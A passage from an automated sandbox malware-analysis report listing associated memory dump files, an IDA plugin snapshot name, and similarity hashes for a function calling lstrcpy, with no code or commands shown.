                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 61e8f2b51ca3b5807f42a0a328248f77490585020ad4e9a9381d4ff3541636cf
                              • Instruction ID: e9947c1e80bf1bbf17916d2ed7bcbbe6cd34bc7d6972df535ec09c50dc0d3856
                              • Opcode Fuzzy Hash: 61e8f2b51ca3b5807f42a0a328248f77490585020ad4e9a9381d4ff3541636cf
                              • Instruction Fuzzy Hash: F9112E74A11B029FDB249F79D41DA26BBF8BF44309B18592DE4D6D7A40EB35E801CB90